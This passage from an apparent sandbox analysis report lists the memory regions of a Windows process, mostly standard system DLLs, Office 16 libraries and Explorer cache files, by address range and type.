0x12945fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012910000" filename = "" Region: id = 414 start_va = 0x12950000 end_va = 0x12994fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 415 start_va = 0x129a0000 end_va = 0x129a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\explorerframe.dll.mui") Region: id = 416 start_va = 0x129b0000 end_va = 0x129b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000129b0000" filename = "" Region: id = 417 start_va = 0x129c0000 end_va = 0x129c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000129c0000" filename = "" Region: id = 418 start_va = 0x129d0000 end_va = 0x129dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000129d0000" filename = "" Region: id = 419 start_va = 0x129e0000 end_va = 0x129e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000129e0000" filename = "" Region: id = 420 start_va = 0x129f0000 end_va = 0x129fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000129f0000" filename = "" Region: id = 421 start_va = 0x12a00000 end_va = 0x12a02fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a00000" filename = "" Region: id = 422 start_va = 0x12a10000 end_va = 0x12a11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012a10000" filename = "" Region: id = 423 start_va = 0x12a20000 end_va = 0x12a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a20000" filename = "" Region: id = 424 start_va = 0x12a30000 end_va = 0x12a30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a30000" filename = "" Region: id = 425 start_va = 0x12a40000 end_va = 0x12a40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a40000" filename = "" Region: id = 426 start_va = 0x12a50000 end_va = 0x12a50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a50000" filename = "" Region: id = 427 start_va = 0x12a60000 end_va = 0x12a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a60000" filename = "" Region: id = 428 start_va = 0x12a70000 end_va = 0x12f4dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012a70000" filename = "" Region: id = 429 start_va = 0x12f50000 end_va = 0x132d6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012f50000" filename = "" Region: id = 430 start_va = 0x132e0000 end_va = 0x13666fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000132e0000" filename = "" Region: id = 431 start_va = 0x13670000 end_va = 0x13a6afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013670000" filename = "" Region: id = 432 start_va = 0x13a70000 end_va = 0x13afdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 433 start_va = 0x13b00000 end_va = 0x13b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013b00000" filename = "" Region: id = 434 start_va = 0x13b40000 end_va = 0x13c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013b40000" filename = "" Region: id = 435 start_va = 0x13c40000 end_va = 0x13d1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 436 start_va = 0x13d20000 end_va = 0x13d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013d20000" filename = "" Region: id = 437 start_va = 0x13d60000 end_va = 0x13e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013d60000" filename = "" Region: id = 438 start_va = 0x13e60000 end_va = 0x13e61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013e60000" filename = "" Region: id = 439 start_va = 0x13e70000 end_va = 0x13e93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013e70000" filename = "" Region: id = 440 start_va = 0x13ea0000 end_va = 0x13ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013ea0000" filename = "" Region: id = 441 start_va = 0x13eb0000 end_va = 0x13ed3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013eb0000" filename = "" Region: id = 442 start_va = 0x13ee0000 end_va = 0x13ee8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013ee0000" filename = "" Region: id = 443 start_va = 0x13ef0000 end_va = 0x13f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013ef0000" filename = "" Region: id = 444 start_va = 0x13f30000 end_va = 0x13f37fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\windows.storage.dll.mui") Region: id = 445 start_va = 0x13f40000 end_va = 0x13f43fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 446 start_va = 0x13f50000 end_va = 0x13f50fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{E23B5DA4-E3A9-461B-8050-8E471867B572}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{e23b5da4-e3a9-461b-8050-8e471867b572}.2.ver0x0000000000000001.db") Region: id = 447 start_va = 0x13f60000 end_va = 0x13f63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 448 start_va = 0x13f70000 end_va = 0x13f70fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{5C9E180F-34BB-4F92-8676-68C88E410C2B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{5c9e180f-34bb-4f92-8676-68c88e410c2b}.2.ver0x0000000000000001.db") Region: id = 449 start_va = 0x13f80000 end_va = 0x13f83fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 450 start_va = 0x13f90000 end_va = 0x13f90fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{0FA68FFF-8D1F-4FCC-B2FC-0C8384CF8D69}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{0fa68fff-8d1f-4fcc-b2fc-0c8384cf8d69}.2.ver0x0000000000000001.db") Region: id = 451 start_va = 0x13fa0000 end_va = 0x13fa3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 452 start_va = 0x13fb0000 end_va = 0x13fb0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{3EC13D2A-C75F-4A0A-9855-0B415D40999C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3ec13d2a-c75f-4a0a-9855-0b415d40999c}.2.ver0x0000000000000001.db") Region: id = 453 start_va = 0x13ff0000 end_va = 0x13ff1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013ff0000" filename = "" Region: id = 454 start_va = 0x14000000 end_va = 0x14001fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 455 start_va = 0x14010000 end_va = 0x14010fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 456 start_va = 0x14020000 end_va = 0x14031fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014020000" filename = "" Region: id = 457 start_va = 0x14040000 end_va = 0x14041fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000014040000" filename = "" Region: id = 458 start_va = 0x14050000 end_va = 0x14056fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014050000" filename = "" Region: id = 459 start_va = 0x14060000 end_va = 0x14063fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014060000" filename = "" Region: id = 460 start_va = 0x14070000 end_va = 0x140affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014070000" filename = "" Region: id = 461 start_va = 0x140b0000 end_va = 0x140effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000140b0000" filename = "" Region: id = 462 start_va = 0x140f0000 end_va = 0x140f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000140f0000" filename = "" Region: id = 463 start_va = 0x14100000 end_va = 0x1413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014100000" filename = "" Region: id = 464 start_va = 0x14150000 end_va = 0x14150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014150000" filename = "" Region: id = 465 start_va = 0x14160000 end_va = 0x14160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014160000" filename = "" Region: id = 466 start_va = 0x14170000 end_va = 0x1426ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014170000" filename = "" Region: id = 467 start_va = 0x14270000 end_va = 0x1436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014270000" filename = "" Region: id = 468 start_va = 0x14370000 end_va = 0x1446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014370000" filename = "" Region: id = 469 start_va = 0x14470000 end_va = 0x1466ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014470000" filename = "" Region: id = 470 start_va = 0x14670000 end_va = 0x1486ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014670000" filename = "" Region: id = 471 start_va = 0x14870000 end_va = 0x1496ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014870000" filename = "" Region: id = 472 start_va = 0x14970000 end_va = 0x14a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014970000" filename = "" Region: id = 473 start_va = 0x14a70000 end_va = 0x14bc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000014a70000" filename = "" Region: id = 474 start_va = 0x14bd0000 end_va = 0x14ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000014bd0000" filename = "" Region: id = 475 start_va = 0x17090000 end_va = 0x1805ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000017090000" filename = "" Region: id = 476 start_va = 0x35100000 end_va = 0x3510ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000035100000" filename = "" Region: id = 477 start_va = 0x67a10000 end_va = 0x67ad8fff monitored = 0 entry_point = 0x67a23180 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 478 start_va = 0x67ae0000 end_va = 0x67b81fff monitored = 0 entry_point = 0x67b1e8b0 region_type = mapped_file name = "windows.storage.search.dll" filename = "\\Windows\\SysWOW64\\Windows.Storage.Search.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.search.dll") Region: id = 479 start_va = 0x67b90000 end_va = 0x67c11fff monitored = 0 entry_point = 0x67bcc7c0 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\SysWOW64\\StructuredQuery.dll" (normalized: "c:\\windows\\syswow64\\structuredquery.dll") Region: id = 480 start_va = 0x67c20000 end_va = 0x67eb2fff monitored = 0 entry_point = 0x67d07e80 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\SysWOW64\\msftedit.dll" (normalized: "c:\\windows\\syswow64\\msftedit.dll") Region: id = 481 start_va = 0x67ec0000 end_va = 0x67efdfff monitored = 0 entry_point = 0x67edab30 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\SysWOW64\\thumbcache.dll" (normalized: "c:\\windows\\syswow64\\thumbcache.dll") Region: id = 482 start_va = 0x67f00000 end_va = 0x67f7afff monitored = 0 entry_point = 0x67f24d80 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\SysWOW64\\duser.dll" (normalized: "c:\\windows\\syswow64\\duser.dll") Region: id = 483 start_va = 0x67f80000 end_va = 0x680e6fff monitored = 0 entry_point = 0x67ffb9d0 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\SysWOW64\\dui70.dll" (normalized: "c:\\windows\\syswow64\\dui70.dll") Region: id = 484 start_va = 0x680f0000 end_va = 0x68529fff monitored = 0 entry_point = 0x6819f860 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\SysWOW64\\ExplorerFrame.dll" (normalized: "c:\\windows\\syswow64\\explorerframe.dll") Region: id = 485 start_va = 0x68530000 end_va = 0x68594fff monitored = 0 entry_point = 0x68566fb0 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\SysWOW64\\msvcp110_win.dll" (normalized: "c:\\windows\\syswow64\\msvcp110_win.dll") Region: id = 486 start_va = 0x685a0000 end_va = 0x685e9fff monitored = 0 entry_point = 0x685aa100 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\SysWOW64\\policymanager.dll" (normalized: "c:\\windows\\syswow64\\policymanager.dll") Region: id = 487 start_va = 0x685f0000 end_va = 0x6866cfff monitored = 0 entry_point = 0x68613ef0 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\Ink\\tiptsf.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 488 start_va = 0x68670000 end_va = 0x68898fff monitored = 0 entry_point = 0x686a9bb4 region_type = mapped_file name = "wxpnse.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\WXPNSE.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\wxpnse.dll") Region: id = 489 start_va = 0x688a0000 end_va = 0x68931fff monitored = 0 entry_point = 0x688add60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 490 start_va = 0x68940000 end_va = 0x68ab2fff monitored = 0 entry_point = 0x689ed220 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 491 start_va = 0x68ac0000 end_va = 0x692b4fff monitored = 0 entry_point = 0x68b25279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\chart.dll") Region: id = 492 start_va = 0x692c0000 end_va = 0x69352fff monitored = 0 entry_point = 0x692e0ec0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\SysWOW64\\twinapi.dll" (normalized: "c:\\windows\\syswow64\\twinapi.dll") Region: id = 493 start_va = 0x69360000 end_va = 0x69501fff monitored = 0 entry_point = 0x69361000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\riched20.dll") Region: id = 494 start_va = 0x69510000 end_va = 0x69517fff monitored = 0 entry_point = 0x695117b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 495 start_va = 0x69520000 end_va = 0x69598fff monitored = 1 entry_point = 0x6952f82a region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 496 start_va = 0x695a0000 end_va = 0x695f8fff monitored = 1 entry_point = 0x695b0780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 497 start_va = 0x69600000 end_va = 0x6961bfff monitored = 0 entry_point = 0x69604720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 498 start_va = 0x69620000 end_va = 0x69628fff monitored = 0 entry_point = 0x69623830 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 499 start_va = 0x69630000 end_va = 0x69663fff monitored = 0 entry_point = 0x69648280 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 500 start_va = 0x69670000 end_va = 0x696cbfff monitored = 0 entry_point = 0x69678880 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll") Region: id = 501 start_va = 0x696d0000 end_va = 0x696fbfff monitored = 0 entry_point = 0x696f24b0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 502 start_va = 0x69700000 end_va = 0x69707fff monitored = 0 entry_point = 0x69701e20 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\SysWOW64\\IconCodecService.dll" (normalized: "c:\\windows\\syswow64\\iconcodecservice.dll") Region: id = 503 start_va = 0x69710000 end_va = 0x6971cfff monitored = 0 entry_point = 0x69717d80 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\SysWOW64\\atlthunk.dll" (normalized: "c:\\windows\\syswow64\\atlthunk.dll") Region: id = 504 start_va = 0x69720000 end_va = 0x69768fff monitored = 0 entry_point = 0x69726450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 505 start_va = 0x69770000 end_va = 0x6977afff monitored = 0 entry_point = 0x69772150 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 506 start_va = 0x69780000 end_va = 0x69799fff monitored = 0 entry_point = 0x69783270 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 507 start_va = 0x697a0000 end_va = 0x697c2fff monitored = 0 entry_point = 0x697b69b0 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\SysWOW64\\globinputhost.dll" (normalized: "c:\\windows\\syswow64\\globinputhost.dll") Region: id = 508 start_va = 0x697d0000 end_va = 0x697e5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 509 start_va = 0x697f0000 end_va = 0x69856fff monitored = 0 entry_point = 0x69805a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 510 start_va = 0x69860000 end_va = 0x69880fff monitored = 0 entry_point = 0x6986bdb0 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 511 start_va = 0x69890000 end_va = 0x698d3fff monitored = 0 entry_point = 0x698aaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 512 start_va = 0x698e0000 end_va = 0x698eefff monitored = 0 entry_point = 0x698e2a50 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 513 start_va = 0x698f0000 end_va = 0x69c78fff monitored = 0 entry_point = 0x6998cc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 514 start_va = 0x69c80000 end_va = 0x6aa31fff monitored = 0 entry_point = 0x69c81000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso.dll") Region: id = 515 start_va = 0x6aa40000 end_va = 0x6aa5cfff monitored = 0 entry_point = 0x6aa47240 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 516 start_va = 0x6aa60000 end_va = 0x6aa7ffff monitored = 0 entry_point = 0x6aa72810 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 517 start_va = 0x6aa80000 end_va = 0x6aa85fff monitored = 0 entry_point = 0x6aa81490 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 518 start_va = 0x6aa90000 end_va = 0x6b027fff monitored = 0 entry_point = 0x6aa91000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 519 start_va = 0x6b030000 end_va = 0x6b744fff monitored = 0 entry_point = 0x6b031000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 520 start_va = 0x6b750000 end_va = 0x6ba51fff monitored = 0 entry_point = 0x6b751000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 521 start_va = 0x6ba60000 end_va = 0x6bc34fff monitored = 0 entry_point = 0x6ba61000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 522 start_va = 0x6bc40000 end_va = 0x6bdaafff monitored = 0 entry_point = 0x6bcae360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 523 start_va = 0x6bdb0000 end_va = 0x6c9a1fff monitored = 0 entry_point = 0x6bdb1000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\oart.dll") Region: id = 524 start_va = 0x6c9b0000 end_va = 0x6ca1cfff monitored = 0 entry_point = 0x6c9eab20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 525 start_va = 0x6ca20000 end_va = 0x6cb00fff monitored = 0 entry_point = 0x6ca4e6b0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 526 start_va = 0x6cb10000 end_va = 0x6cbdafff monitored = 0 entry_point = 0x6cb26a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 527 start_va = 0x6cbe0000 end_va = 0x6cc44fff monitored = 0 entry_point = 0x6cbffa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 528 start_va = 0x6cc50000 end_va = 0x6ce04fff monitored = 0 entry_point = 0x6cd43d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 529 start_va = 0x6ce10000 end_va = 0x6ce3cfff monitored = 0 entry_point = 0x6ce22b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 530 start_va = 0x6cec0000 end_va = 0x6d0d7fff monitored = 0 entry_point = 0x6cf697b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 531 start_va = 0x6d0e0000 end_va = 0x6d14ffff monitored = 0 entry_point = 0x6d119e70 region_type = mapped_file name = "directmanipulation.dll" filename = "\\Windows\\SysWOW64\\directmanipulation.dll" (normalized: "c:\\windows\\syswow64\\directmanipulation.dll") Region: id = 532 start_va = 0x6d5b0000 end_va = 0x6da3dfff monitored = 0 entry_point = 0x6d93a320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 533 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 534 start_va = 